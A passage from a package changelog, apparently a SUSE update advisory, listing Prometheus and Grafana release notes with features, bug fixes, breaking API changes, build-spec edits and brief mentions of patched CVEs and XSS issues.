#6116, #6133\n\n - UI: handle null response from API properly. #6071\n\n - Changes from 2.13.1\n\n + Bug fixes\n\n - Fix panic in ARM builds of Prometheus. #6110\n\n - promql: fix potential panic in the query logger. #6094\n\n - Multiple errors of http: superfluous\n response.WriteHeader call in the logs. #6145\n\n - Changes from 2.13.0\n\n + Enhancements\n\n - Metrics: renamed prometheus_sd_configs_failed_total to\n prometheus_sd_failed_configs and changed to Gauge #5254\n\n - Include the tsdb tool in builds. #6089\n\n - Service discovery: add new node address types for\n kubernetes. #5902\n\n - UI: show warnings if query have returned some warnings.\n #5964\n\n - Remote write: reduce memory usage of the series cache.\n #5849\n\n - Remote read: use remote read streaming to reduce memory\n usage. #5703\n\n - Metrics: added metrics for remote write max/min/desired\n shards to queue manager. #5787\n\n - Promtool: show the warnings during label query. #5924\n\n - Promtool: improve error messages when parsing bad rules.\n #5965\n\n - Promtool: more promlint rules. #5515\n\n + Bug fixes\n\n - UI: Fix a Stored DOM XSS vulnerability with query\n history\n [CVE-2019-10215](http://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2019-10215). #6098\n\n - Promtool: fix recording inconsistency due to duplicate\n labels. #6026\n\n - UI: fixes service-discovery view when accessed from\n unhealthy targets. #5915\n\n - Metrics format: OpenMetrics parser crashes on short\n input. #5939\n\n - UI: avoid truncated Y-axis values. #6014\n\n - Changes from 2.12.0\n\n + Features \n\n - Track currently active PromQL queries in a log file.\n #5794\n\n - Enable and provide binaries for `mips64` / `mips64le`\n architectures. #5792\n\n + Enhancements\n\n - Improve responsiveness of targets web UI and API\n endpoint. #5740\n\n - Improve remote write desired shards calculation. #5763\n\n - Flush TSDB pages more precisely. tsdb#660\n\n - Add `prometheus_tsdb_retention_limit_bytes` metric.\n tsdb#667\n\n - Add logging during TSDB WAL replay on startup. tsdb#662\n\n - Improve TSDB memory usage. tsdb#653, tsdb#643, tsdb#654,\n tsdb#642, tsdb#627\n\n + Bug fixes\n\n - Check for duplicate label names in remote read. #5829\n\n - Mark deleted rules' series as stale on next evaluation.\n #5759\n\n - Fix JavaScript error when showing warning about\n out-of-sync server time. #5833\n\n - Fix `promtool test rules` panic when providing empty\n `exp_labels`. #5774\n\n - Only check last directory when discovering checkpoint\n number. #5756\n\n - Fix error propagation in WAL watcher helper functions.\n #5741\n\n - Correctly handle empty labels from alert templates.\n #5845\n\n - Update Uyuni/SUSE Manager service discovery patch\n\n + Adapt service discovery to the new Uyuni API endpoints\n\n + Modified spec file: force golang 1.12 to fix build\n issues in SLE15SP2\n\n - Update to Prometheus 2.11.2\n\ngrafana :\n\n - Update to version 7.0.3\n\n - Features / Enhancements\n\n - Stats: include all fields. #24829, @ryantxu\n\n - Variables: change VariableEditorList row action Icon to\n IconButton. #25217, @hshoff\n\n - Bug fixes\n\n - Cloudwatch: Fix dimensions of DDoSProtection. #25317,\n @papagian\n\n - Configuration: Fix env var override of sections\n containing hyphen. #25178, @marefr\n\n - Dashboard: Get panels in collapsed rows. #25079,\n @peterholmberg\n\n - Do not show alerts tab when alerting is disabled.\n #25285, @dprokop\n\n - Jaeger: fixes cascader option label duration value.\n #25129, @Estrax\n\n - Transformations: Fixed Transform tab crash & no update\n after adding first transform. #25152, @torkelo\n\n - Update to version 7.0.2\n\n - Bug fixes\n\n - Security: Urgent security patch release to fix\n CVE-2020-13379\n\n - Update to version 7.0.1\n\n - Features / Enhancements\n\n - Datasource/CloudWatch: Makes CloudWatch Logs query\n history more readable. #24795, @kaydelaney\n\n - Download CSV: Add date and time formatting. #24992,\n @ryantxu\n\n - Table: Make last cell value visible when right aligned.\n #24921, @peterholmberg\n\n - TablePanel: Adding sort order persistance. #24705,\n @torkelo\n\n - Transformations: Display correct field name when using\n reduce transformation. #25068, @peterholmberg\n\n - Transformations: Allow custom number input for binary\n operations. #24752, @ryantxu\n\n - Bug fixes\n\n - Dashboard/Links: Fixes dashboard links by tags not\n working. #24773, @KamalGalrani\n\n - Dashboard/Links: Fixes open in new window for dashboard\n link. #24772, @KamalGalrani\n\n - Dashboard/Links: Variables are resolved and limits to\n 100. #25076, @hugohaggmark\n\n - DataLinks: Bring back variables interpolation in title.\n #24970, @dprokop\n\n - Datasource/CloudWatch: Field suggestions no longer\n limited to prefix-only. #24855, @kaydelaney\n\n - Explore/Table: Keep existing field types if possible.\n #24944, @kaydelaney\n\n - Explore: Fix wrap lines toggle for results of queries\n with filter expression. #24915, @ivanahuckova\n\n - Explore: fix undo in query editor. #24797, @zoltanbedi\n\n - Explore: fix word break in type head info. #25014,\n @zoltanbedi\n\n - Graph: Legend decimals now work as expected. #24931,\n @torkelo\n\n - LoginPage: Fix hover color for service buttons. #25009,\n @tskarhed\n\n - LogsPanel: Fix scrollbar. #24850, @ivanahuckova\n\n - MoveDashboard: Fix for moving dashboard caused all\n variables to be lost. #25005, @torkelo\n\n - Organize transformer: Use display name in field order\n comparer. #24984, @dprokop\n\n - Panel: shows correct panel menu items in view mode.\n #24912, @hugohaggmark\n\n - PanelEditor Fix missing labels and description if there\n is only single option in category. #24905, @dprokop\n\n - PanelEditor: Overrides name matcher still show all\n original field names even after Field default display\n name is specified. #24933, @torkelo\n\n - PanelInspector: Makes sure Data display options are\n visible. #24902, @hugohaggmark\n\n - PanelInspector: Hides unsupported data display options\n for Panel type. #24918, @hugohaggmark\n\n - PanelMenu: Make menu disappear on button press. #25015,\n @tskarhed\n\n - Postgres: Fix add button. #25087, @phemmer\n\n - Prometheus: Fix recording rules expansion. #24977,\n @ivanahuckova\n\n - Stackdriver: Fix creating Service Level Objectives (SLO)\n datasource query variable. #25023, @papagian\n\n - Update to version 7.0.0 \n\n - Breaking changes\n\n - Removed PhantomJS: PhantomJS was deprecated in Grafana\n v6.4 and starting from Grafana v7.0.0, all PhantomJS\n support has been removed. This means that Grafana no\n longer ships with a built-in image renderer, and we\n advise you to install the Grafana Image Renderer plugin.\n\n - Dashboard: A global minimum dashboard refresh interval\n is now enforced and defaults to 5 seconds.\n\n - Interval calculation: There is now a new option Max data\n points that controls the auto interval $__interval\n calculation. Interval was previously calculated by\n dividing the panel width by the time range. With the new\n max data points option it is now easy to set $__interval\n to a dynamic value that is time range agnostic. For\n example if you set Max data points to 10 Grafana will\n dynamically set $__interval by dividing the current time\n range by 10.\n\n - Datasource/Loki: Support for deprecated Loki endpoints\n has been removed.\n\n - Backend plugins: Grafana now requires backend plugins to\n be signed, otherwise Grafana will not load/start them.\n This is an additional security measure to make sure\n backend plugin binaries and files haven't been tampered\n with. Refer to Upgrade Grafana for more information.\n\n - @grafana/ui: Forms migration notice, see @grafana/ui\n changelog\n\n - @grafana/ui: Select API change for creating custom\n values, see @grafana/ui changelog\n\n + Deprecation warnings\n\n - Scripted dashboards is now deprecated. The feature is\n not removed but will be in a future release. We hope to\n address the underlying requirement of dynamic dashboards\n in a different way. #24059\n\n - The unofficial first version of backend plugins together\n with usage of grafana/grafana-plugin-model is now\n deprecated and support for that will be removed in a\n future release. Please refer to backend plugins\n documentation for information about the new officially\n supported backend plugins.\n\n - Features / Enhancements\n\n - Backend plugins: Log deprecation warning when using the\n unofficial first version of backend plugins. #24675,\n @marefr\n\n - Editor: New line on Enter, run query on Shift+Enter.\n #24654, @davkal\n\n - Loki: Allow multiple derived fields with the same name.\n #24437, @aocenas\n\n - Orgs: Add future deprecation notice. #24502, @torkelo\n\n - Bug Fixes\n\n - @grafana/toolkit: Use process.cwd() instead of PWD to\n get directory. #24677, @zoltanbedi\n\n - Admin: Makes long settings values line break in settings\n page. #24559, @hugohaggmark\n\n - Dashboard: Allow editing provisioned dashboard JSON and\n add confirmation when JSON is copied to dashboard.\n #24680, @dprokop\n\n - Dashboard: Fix for strange 'dashboard not found' errors\n when opening links in dashboard settings. #24416,\n @torkelo\n\n - Dashboard: Fix so default data source is selected when\n data source can't be found in panel editor. #24526,\n @mckn\n\n - Dashboard: Fixed issue changing a panel from transparent\n back to normal in panel editor. #24483, @torkelo\n\n - Dashboard: Make header names reflect the field name when\n exporting to CSV file from the the panel inspector.\n #24624, @peterholmberg\n\n - Dashboard: Make sure side pane is displayed with tabs by\n default in panel editor. #24636, @dprokop\n\n - Data source: Fix query/annotation help content\n formatting. #24687, @AgnesToulet\n\n - Data source: Fixes async mount errors. #24579, @Estrax\n\n - Data source: Fixes saving a data source without failure\n when URL doesn't specify a protocol. #24497, @aknuds1\n\n - Explore/Prometheus: Show results of instant queries only\n in table. #24508, @ivanahuckova\n\n - Explore: Fix rendering of react query editors. #24593,\n @ivanahuckova\n\n - Explore: Fixes loading more logs in logs context view.\n #24135, @Estrax\n\n - Graphite: Fix schema and dedupe strategy in rollup\n indicators for Metrictank queries. #24685, @torkelo\n\n - Graphite: Makes query annotations work again. #24556,\n @hugohaggmark\n\n - Logs: Clicking 'Load more' from context overlay doesn't\n expand log row. #24299, @kaydelaney\n\n - Logs: Fix total bytes process calculation. #24691,\n @davkal\n\n - Org/user/team preferences: Fixes so UI Theme can be set\n back to Default. #24628, @AgnesToulet\n\n - Plugins: Fix manifest validation. #24573, @aknuds1\n\n - Provisioning: Use proxy as default access mode in\n provisioning. #24669, @bergquist\n\n - Search: Fix select item when pressing enter and Grafana\n is served using a sub path. #24634, @tskarhed\n\n - Search: Save folder expanded state. #24496, @Clarity-89\n\n - Security: Tag value sanitization fix in OpenTSDB data\n source. #24539, @rotemreiss\n\n - Table: Do not include angular options in options when\n switching from angular panel. #24684, @torkelo\n\n - Table: Fixed persisting column resize for time series\n fields. #24505, @torkelo\n\n - Table: Fixes Cannot read property subRows of null.\n #24578, @hugohaggmark\n\n - Time picker: Fixed so you can enter a relative range in\n the time picker without being converted to absolute\n range. #24534, @mckn\n\n - Transformations: Make transform dropdowns not cropped.\n #24615, @dprokop\n\n - Transformations: Sort order should be preserved as\n entered by user when using the reduce transformation.\n #24494, @hugohaggmark\n\n - Units: Adds scale symbol for currencies with suffixed\n symbol. #24678, @hugohaggmark\n\n - Variables: Fixes filtering options with more than 1000\n entries. #24614, @hugohaggmark\n\n - Variables: Fixes so Textbox variables read value from\n url. #24623, @hugohaggmark\n\n - Zipkin: Fix error when span contains remoteEndpoint.\n #24524, @aocenas\n\n - SAML: Switch from email to login for user login\n attribute mapping (Enterprise)\n\n - Update Makefile and spec file\n\n - Remove phantomJS patch from Makefile \n\n - Fix multiline strings in Makefile\n\n - Exclude s390 from SLE12 builds, golang 1.14 is not built\n for s390\n\n - Add instructions for patching the Grafana JavaScript\n frontend.\n\n - BuildRequires golang(API) instead of go metapackage\n version range\n\n - BuildRequires: golang(API) >= 1.14 from BuildRequires: (\n go >= 1.14 with go < 1.15 )\n\n - Update to version 6.7.3\n\n - This version fixes bsc#1170557 and its corresponding\n CVE-2020-12245\n\n - Admin: Fix Synced via LDAP message for non-LDAP external\n users. #23477, @alexanderzobnin\n\n - Alerting: Fixes notifications for alerts with empty\n message in Google Hangouts notifier. #23559,\n @hugohaggmark\n\n - AuthProxy: Fixes bug where long username could not be\n cached.. #22926, @jcmcken\n\n - Dashboard: Fix saving dashboard when editing raw\n dashboard JSON model. #23314, @peterholmberg\n\n - Dashboard: Try to parse 8 and 15 digit numbers as\n timestamps if parsing of time range as date fails.\n #21694, @jessetan\n\n - DashboardListPanel: Fixed problem with empty panel after\n going into edit mode (General folder filter being\n automatically added) . #23426, @torkelo\n\n - Data source: Handle datasource withCredentials option\n properly. #23380, @hvtuananh\n\n - Security: Fix annotation popup XSS vulnerability.\n #23813, @torkelo\n\n - Server: Exit Grafana with status code 0 if no error.\n #23312, @aknuds1\n\n - TablePanel: Fix XSS issue in header column rename\n (backport). #23814, @torkelo\n\n - Variables: Fixes error when setting adhoc variable\n values. #23580, @hugohaggmark\n\n - Update to version 6.7.2: (see installed changelog for\n the full list of changes)\n\n - BackendSrv: Adds config to response to fix issue for\n external plugins that used this property . #23032,\n @torkelo\n\n - Dashboard: Fixed issue with saving new dashboard after\n changing title . #23104, @dprokop\n\n - DataLinks: make sure we use the correct datapoint when\n dataset contains null value.. #22981, @mckn\n\n - Plugins: Fixed issue for plugins that imported dateMath\n util . #23069, @mckn\n\n - Security: Fix for dashboard snapshot original dashboard\n link could contain XSS vulnerability in url. #23254,\n @torkelo\n\n - Variables: Fixes issue with too many queries being\n issued for nested template variables after value change.\n #23220, @torkelo\n\n - Plugins: Expose promiseToDigest. #23249, @torkelo\n\n - Reporting (Enterprise): Fixes issue updating a report\n created by someone else\n\n - Update to 6.7.1: (see installed changelog for the full\n list of changes) Bug Fixes\n\n - Azure: Fixed dropdowns not showing current value.\n #22914, @torkelo\n\n - BackendSrv: only add content-type on POST, PUT requests.\n #22910, @hugohaggmark\n\n - Panels: Fixed size issue with panel internal size when\n exiting panel edit mode. #22912, @torkelo\n\n - Reporting: fixes migrations compatibility with mysql\n (Enterprise)\n\n - Reporting: Reduce default concurrency limit to 4\n (Enterprise)\n\n - Update to 6.7.0: (see installed changelog for the full\n list of changes) Bug Fixes\n\n - AngularPanels: Fixed inner height calculation for\n angular panels . #22796, @torkelo\n\n - BackendSrv: makes sure provided headers are correctly\n recognized and set. #22778, @hugohaggmark\n\n - Forms: Fix input suffix position (caret-down in Select)\n . #22780, @torkelo\n\n - Graphite: Fixed issue with query editor and next select\n metric now showing after selecting metric node . #22856,\n @torkelo\n\n - Rich History: UX adjustments and fixes. #22729,\n @ivanahuckova\n\n - Update to 6.7.0-beta1: Breaking changes\n\n - Slack: Removed Mention setting and instead introduce\n Mention Users, Mention Groups, and Mention Channel. The\n first two settings require user and group IDs,\n respectively. This change was necessary because the way\n of mentioning via the Slack API changed and mentions in\n Slack notifications no longer worked.\n\n - Alerting: Reverts the behavior of diff and percent_diff\n to not always be absolute. Something we introduced by\n mistake in 6.1.0. Alerting now support diff(),\n diff_abs(), percent_diff() and percent_diff_abs().\n #21338\n\n - Notice about changes in backendSrv for plugin authors In\n our mission to migrate away from AngularJS to React we\n have removed all AngularJS dependencies in the core data\n retrieval service backendSrv. Removing the AngularJS\n dependencies in backendSrv has the unfortunate side\n effect of AngularJS digest no longer being triggered for\n any request made with backendSrv. Because of this,\n external plugins using backendSrv directly may suffer\n from strange behaviour in the UI. To remedy this issue,\n as a plugin author you need to trigger the digest after\n a direct call to backendSrv. Bug Fixes API: Fix redirect\n issues. #22285, @papagian Alerting: Don't include\n image_url field with Slack message if empty. #22372,\n @aknuds1 Alerting: Fixed bad background color for\n default notifications in alert tab . #22660, @krvajal\n Annotations: In table panel when setting transform to\n annotation, they will now show up right away without a\n manual refresh. #22323, @krvajal Azure Monitor: Fix app\n insights source to allow for new __timeFrom and\n __timeTo. #21879, @ChadNedzlek BackendSrv: Fixes POST\n body for form data. #21714, @hugohaggmark CloudWatch:\n Credentials cache invalidation fix. #22473, @sunker\n CloudWatch: Expand alias variables when query yields no\n result. #22695, @sunker Dashboard: Fix bug with NaN in\n alerting. #22053, @a-melnyk Explore: Fix display of\n multiline logs in log panel and explore. #22057,\n @thomasdraebing Heatmap: Legend color range is incorrect\n when using custom min/max. #21748, @sv5d Security: Fixed\n XSS issue in dashboard history diff . #22680, @torkelo\n StatPanel: Fixes base color is being used for null\n values . #22646, @torkelo\n\n - Update to version 6.6.2: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.6.1: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.6.0: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.3: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.2: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.1: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.0 (see installed changelog for the\n full list of changes)\n\n - Update to version 6.4.5 :\n\n - Create version 6.4.5\n\n - CloudWatch: Fix high CPU load (#20579)\n\n - Add obs-service-go_modules to download required modules\n into vendor.tar.gz\n\n - Adjusted spec file to use vendor.tar.gz\n\n - Adjusted Makefile to work with new filenames\n\n - BuildRequire go1.14\n\n - Update to version 6.4.4 :\n\n - DataLinks: Fix blur issues. #19883, @aocenas\n\n - Docker: Makes it possible to parse timezones in the\n docker image. #20081, @xlson\n\n - LDAP: All LDAP servers should be tried even if one of\n them returns a connection error. #20077, @jongyllen\n\n - LDAP: No longer shows incorrectly matching groups based\n on role in debug page. #20018, @xlson\n\n - Singlestat: Fix no data / null value mapping . #19951,\n @ryantxu\n\n - Revert the spec file and make script\n\n - Remove PhantomJS dependency\n\n - Update to 6.4.3\n\n - Bug Fixes\n\n - Alerting: All notification channels should send even if\n one fails to send. #19807, @jan25\n\n - AzureMonitor: Fix slate interference with dropdowns.\n #19799, @aocenas\n\n - ContextMenu: make ContextMenu positioning aware of the\n viewport width. #19699, @krvajal\n\n - DataLinks: Fix context menu not showing in\n singlestat-ish visualisations. #19809, @dprokop\n\n - DataLinks: Fix url field not releasing focus. #19804,\n @aocenas\n\n - Datasource: Fixes clicking outside of some query editors\n required 2 clicks. #19822, @aocenas\n\n - Panels: Fixes default tab for visualizations without\n Queries Tab. #19803, @hugohaggmark\n\n - Singlestat: Fixed issue with mapping null to text.\n #19689, @torkelo\n\n - @grafana/toolkit: Don't fail plugin creation when git\n user.name config is not set. #19821, @dprokop\n\n - @grafana/toolkit: TSLint line number off by 1. #19782,\n @fredwangwang\n\n - Update to 6.4.2\n\n - Bug Fixes\n\n - CloudWatch: Changes incorrect dimension wmlid to wlmid .\n #19679, @ATTron\n\n - Grafana Image Renderer: Fixes plugin page. #19664,\n @hugohaggmark\n\n - Graph: Fixes auto decimals logic for y axis ticks that\n results in too many decimals for high values. #19618,\n @torkelo\n\n - Graph: Switching to series mode should re-render graph.\n #19623, @torkelo\n\n - Loki: Fix autocomplete on label values. #19579, @aocenas\n\n - Loki: Removes live option for logs panel. #19533,\n @davkal\n\n - Profile: Fix issue with user profile not showing more\n than sessions sessions in some cases. #19578,\n @huynhsamha\n\n - Prometheus: Fixes so results in Panel always are sorted\n by query order. #19597, @hugohaggmark\n\n - ShareQuery: Fixed issue when using -- Dashboard --\n datasource (to share query result) when dashboard had\n rows. #19610, @torkelo\n\n - Show SAML login button if SAML is enabled. #19591,\n @papagian\n\n - SingleStat: Fixes postfix/prefix usage. #19687,\n @hugohaggmark\n\n - Table: Proper handling of json data with dataframes.\n #19596, @marefr\n\n - Units: Fixed wrong id for Terabits/sec. #19611,\n @andreaslangnevyjel\n\n - Changes from 6.4.1\n\n - Bug Fixes\n\n - Provisioning: Fixed issue where empty nested keys in\n YAML provisioning caused a server crash, #19547\n\n - ImageRendering: Fixed issue with image rendering in\n enterprise build (Enterprise)\n\n - Reporting: Fixed issue with reporting service when STMP\n was disabled (Enterprise).\n\n - Changes from 6.4.0\n\n - Features / Enhancements\n\n - Build: Upgrade go to 1.12.10. #19499, @marefr\n\n - DataLinks: Suggestions menu improvements. #19396,\n @dprokop\n\n - Explore: Take root_url setting into account when\n redirecting from dashboard to explore. #19447,\n @ivanahuckova\n\n - Explore: Update broken link to logql docs. #19510,\n @ivanahuckova\n\n - Logs: Adds Logs Panel as a visualization. #19504,\n @davkal\n\n - Bug Fixes\n\n - CLI: Fix version selection for plugin install. #19498,\n @aocenas\n\n - Graph: Fixes minor issue with series override color\n picker and custom color . #19516, @torkelo\n\n - Changes from 6.4.0 Beta 2\n\n - Features / Enhancements\n\n - Azure Monitor: Remove support for cross resource queries\n (#19115)'. #19346, @sunker\n\n - Docker: Upgrade packages to resolve reported\n vulnerabilities. #19188, @marefr\n\n - Graphite: Time range expansion reduced from 1 minute to\n 1 second. #19246, @torkelo\n\n - grafana/toolkit: Add plugin creation task. #19207,\n @dprokop\n\n - Bug Fixes\n\n - Alerting: Prevents creating alerts from unsupported\n queries. #19250, @hugohaggmark\n\n - Alerting: Truncate PagerDuty summary when greater than\n 1024 characters. #18730, @nvllsvm\n\n - Cloudwatch: Fix autocomplete for Gamelift dimensions.\n #19146, @kevinpz\n\n - Dashboard: Fix export for sharing when panels use\n default data source. #19315, @torkelo\n\n - Database: Rewrite system statistics query to perform\n better. #19178, @papagian\n\n - Gauge/BarGauge: Fix issue with [object Object] in titles\n . #19217, @ryantxu\n\n - MSSQL: Revert usage of new connectionstring format\n introduced by #18384. #19203, @marefr\n\n - Multi-LDAP: Do not fail-fast on invalid credentials.\n #19261, @gotjosh\n\n - MySQL, Postgres, MSSQL: Fix validating query with\n template variables in alert . #19237, @marefr\n\n - MySQL, Postgres: Update raw sql when query builder\n updates. #19209, @marefr\n\n - MySQL: Limit datasource error details returned from the\n backend. #19373, @marefr\n\n - Changes from 6.4.0 Beta 1\n\n - Features / Enhancements\n\n - API: Readonly datasources should not be created via the\n API. #19006, @papagian\n\n - Alerting: Include configured AlertRuleTags in Webhooks\n notifier. #18233, @dominic-miglar\n\n - Annotations: Add annotations support to Loki. #18949,\n @aocenas\n\n - Annotations: Use a single row to represent a region.\n #17673, @ryantxu\n\n - Auth: Allow inviting existing users when login form is\n disabled. #19048, @548017\n\n - Azure Monitor: Add support for cross resource queries.\n #19115, @sunker\n\n - CLI: Allow installing custom binary plugins. #17551,\n @aocenas\n\n - Dashboard: Adds Logs Panel (alpha) as visualization\n option for Dashboards. #18641, @hugohaggmark\n\n - Dashboard: Reuse query results between panels . #16660,\n @ryantxu\n\n - Dashboard: Set time to to 23:59:59 when setting To time\n using calendar. #18595, @simPod\n\n - DataLinks: Add DataLinks support to Gauge, BarGauge and\n SingleStat2 panel. #18605, @ryantxu\n\n - DataLinks: Enable access to labels & field names.\n #18918, @torkelo\n\n - DataLinks: Enable multiple data links per panel. #18434,\n @dprokop\n\n - Docker: switch docker image to alpine base with\n phantomjs support. #18468, @DanCech\n\n - Elasticsearch: allow templating queries to order by\n doc_count. #18870, @hackery\n\n - Explore: Add throttling when doing live queries. #19085,\n @aocenas\n\n - Explore: Adds ability to go back to dashboard,\n optionally with query changes. #17982, @kaydelaney\n\n - Explore: Reduce default time range to last hour. #18212,\n @davkal\n\n - Gauge/BarGauge: Support decimals for min/max. #18368,\n @ryantxu\n\n - Graph: New series override transform constant that\n renders a single point as a line across the whole graph.\n #19102, @davkal\n\n - Image rendering: Add deprecation warning when PhantomJS\n is used for rendering images. #18933, @papagian\n\n - InfluxDB: Enable interpolation within ad-hoc filter\n values. #18077, @kvc-code\n\n - LDAP: Allow an user to be synchronized against LDAP.\n #18976, @gotjosh\n\n - Ldap: Add ldap debug page. #18759, @peterholmberg\n\n - Loki: Remove prefetching of default label values.\n #18213, @davkal\n\n - Metrics: Add failed alert notifications metric. #18089,\n @koorgoo\n\n - OAuth: Support JMES path lookup when retrieving user\n email. #14683, @bobmshannon\n\n - OAuth: return GitLab groups as a part of user info\n (enable team sync). #18388, @alexanderzobnin\n\n - Panels: Add unit for electrical charge - ampere-hour.\n #18950, @anirudh-ramesh\n\n - Plugin: AzureMonitor - Reapply MetricNamespace support.\n #17282, @raphaelquati\n\n - Plugins: better warning when plugins fail to load.\n #18671, @ryantxu\n\n - Postgres: Add support for scram sha 256 authentication.\n #18397, @nonamef\n\n - RemoteCache: Support SSL with Redis. #18511, @kylebrandt\n\n - SingleStat: The gauge option in now disabled/hidden\n (unless it's an old panel with it already enabled) .\n #18610, @ryantxu\n\n - Stackdriver: Add extra alignment period options. #18909,\n @sunker\n\n - Units: Add South African Rand (ZAR) to currencies.\n #18893, @jeteon\n\n - Units: Adding T,P,E,Z,and Y bytes. #18706, @chiqomar\n\n - Bug Fixes\n\n - Alerting: Notification is sent when state changes from\n no_data to ok. #18920, @papagian\n\n - Alerting: fix duplicate alert states when the alert\n fails to save to the database. #18216, @kylebrandt\n\n - Alerting: fix response popover prompt when add\n notification channels. #18967, @lzdw\n\n - CloudWatch: Fix alerting for queries with Id (using\n GetMetricData). #17899, @alex-berger\n\n - Explore: Fix auto completion on label values for Loki.\n #18988, @aocenas\n\n - Explore: Fixes crash using back button with a zoomed in\n graph. #19122, @hugohaggmark\n\n - Explore: Fixes so queries in Explore are only run if\n Graph/Table is shown. #19000, @hugohaggmark\n\n - MSSQL: Change connectionstring to URL format to fix\n using passwords with semicolon. #18384, @Russiancold\n\n - MSSQL: Fix memory leak when debug enabled. #19049,\n @briangann\n\n - Provisioning: Allow escaping literal '$' with '$$' in\n configs to avoid interpolation. #18045, @kylebrandt\n\n - TimePicker: Fixes hiding time picker dropdown in\n FireFox. #19154, @hugohaggmark\n\n - Breaking changes\n\n + Annotations There are some breaking changes in the\n annotations HTTP API for region annotations. Region\n annotations are now represented using a single event\n instead of two separate events. Check breaking changes\n in HTTP API below and HTTP API documentation for more\n details.\n\n + Docker Grafana is now using Alpine 3.10 as docker base\n image.\n\n + HTTP API\n\n - GET /api/alert-notifications now requires at least\n editor access. New /api/alert-notifications/lookup\n returns less information than /api/alert-notifications\n and can be access by any authenticated user.\n\n - GET /api/alert-notifiers now requires at least editor\n access\n\n - GET /api/org/users now requires org admin role. New\n /api/org/users/lookup returns less information than\n /api/org/users and can be access by users that are org\n admins, admin in any folder or admin of any team.\n\n - GET /api/annotations no longer returns regionId\n property.\n\n - POST /api/annotations no longer supports isRegion\n property.\n\n - PUT /api/annotations/:id no longer supports isRegion\n property.\n\n - PATCH /api/annotations/:id no longer supports isRegion\n property.\n\n - DELETE /api/annotations/region/:id has been removed.\n\n - Deprecation notes\n\n + PhantomJS\n\n - PhantomJS, which is used for rendering images of\n dashboards and panels, is deprecated and will be removed\n in a future Grafana release. A deprecation warning will\n from now on be logged when Grafana starts up if\n PhantomJS is in use. Please consider migrating from\n PhantomJS to the Grafana Image Renderer plugin.\n\n - Changes from 6.3.6\n\n - Features / Enhancements\n\n - Metrics: Adds setting for turning off total stats\n metrics. #19142, @marefr\n\n - Bug Fixes\n\n - Database: Rewrite system statistics query to perform\n better. #19178, @papagian\n\n - Explore: Fixes error when switching from prometheus to\n loki data sources. #18599, @kaydelaney\n\n - Rebase package spec. Use mostly from fedora, fix suse\n specified things and fix some errors.\n\n - Add missing directories provisioning/datasources and\n provisioning/notifiers and sample.yaml as described in\n packaging/rpm/control from upstream. Missing directories\n are shown in logfiles.\n\n - Version 6.3.5\n\n - Upgrades\n\n + Build: Upgrade to go 1.12.9.\n\n - Bug Fixes\n\n + Dashboard: Fixes dashboards init failed loading error\n for dashboards with panel links that had missing\n properties.\n\n + Editor: Fixes issue where only entire lines were being\n copied.\n\n + Explore: Fixes query field layout in splitted view for\n Safari browsers.\n\n + LDAP: multildap + ldap integration.\n\n + Profile/UserAdmin: Fix for user agent parser crashes\n grafana-server on 32-bit builds.\n\n + Prometheus: Prevents panel editor crash when switching\n to Prometheus datasource.\n\n + Prometheus: Changes brace-insertion behavior to be less\n annoying.\n\n - Version 6.3.4\n\n - Security: CVE-2019-15043 - Parts of the HTTP API allow\n unauthenticated use.\n\n - Version 6.3.3\n\n - Bug Fixes\n\n + Annotations: Fix failing annotation query when time\n series query is cancelled. #18532 1, @dprokop 1\n\n + Auth: Do not set SameSite cookie attribute if\n cookie_samesite is none. #18462 1, @papagian 3\n\n + DataLinks: Apply scoped variables to data links\n correctly. #18454 1, @dprokop 1\n\n + DataLinks: Respect timezone when displaying\n datapoint&rsquo;s timestamp in graph context menu.\n #18461 2, @dprokop 1\n\n + DataLinks: Use datapoint timestamp correctly when\n interpolating variables. #18459 1, @dprokop 1\n\n + Explore: Fix loading error for empty queries. #18488 1,\n @davkal\n\n + Graph: Fixes legend issue clicking on series line icon\n and issue with horizontal scrollbar being visible on\n windows. #18563 1, @torkelo 2\n\n + Graphite: Avoid glob of single-value array variables .\n #18420, @gotjosh\n\n + Prometheus: Fix queries with label_replace remove the $1\n match when loading query editor. #18480 5, @hugohaggmark\n 3\n\n + Prometheus: More consistently allows for multi-line\n queries in editor. #18362 2, @kaydelaney 2\n\n + TimeSeries: Assume values are all numbers. #18540 4,\n @ryantxu\n\n - Version 6.3.2\n\n - Bug Fixes\n\n + Gauge/BarGauge: Fixes issue with losts thresholds and\n issue loading Gauge with avg stat. #18375 12\n\n - Version 6.3.1\n\n - Bug Fixes\n\n + PanelLinks: Fix crash issue Gauge & Bar Gauge for panels\n with panel links (drill down links). #18430 2\n\n - Version 6.3.0\n\n - Features / Enhancements\n\n + OAuth: Do not set SameSite OAuth cookie if\n cookie_samesite is None. #18392 4, @papagian 3\n\n + Auth Proxy: Include additional headers as part of the\n cache key. #18298 6, @gotjosh\n\n + Build grafana images consistently. #18224 12,\n @hassanfarid\n\n + Docs: SAML. #18069 11, @gotjosh\n\n + Permissions: Show plugins in nav for non admin users but\n hide plugin configuration. #18234 1, @aocenas\n\n + TimePicker: Increase max height of quick range dropdown.\n #18247 2, @torkelo 2\n\n + Alerting: Add tags to alert rules. #10989 13, @Thib17 1\n\n + Alerting: Attempt to send email notifications to all\n given email addresses. #16881 1, @zhulongcheng\n\n + Alerting: Improve alert rule testing. #16286 2, @marefr\n\n + Alerting: Support for configuring content field for\n Discord alert notifier. #17017 2, @jan25\n\n + Alertmanager: Replace illegal chars with underscore in\n label names. #17002 5, @bergquist 1\n\n + Auth: Allow expiration of API keys. #17678, @papagian 3\n\n + Auth: Return device, os and browser when listing user\n auth tokens in HTTP API. #17504, @shavonn 1\n\n + Auth: Support list and revoke of user auth tokens in UI.\n #17434 2, @shavonn 1\n\n + AzureMonitor: change clashing built-in Grafana\n variables/macro names for Azure Logs. #17140, @shavonn 1\n\n + CloudWatch: Made region visible for AWS Cloudwatch\n Expressions. #17243 2, @utkarshcmu\n\n + Cloudwatch: Add AWS DocDB metrics. #17241, @utkarshcmu\n\n + Dashboard: Use timezone dashboard setting when exporting\n to CSV. #18002 1, @dehrax\n\n + Data links. #17267 11, @torkelo 2\n\n + Docker: Switch base image to ubuntu:latest from\n debian:stretch to avoid security issues&hellip; #17066\n 5, @bergquist 1\n\n + Elasticsearch: Support for visualizing logs in Explore .\n #17605 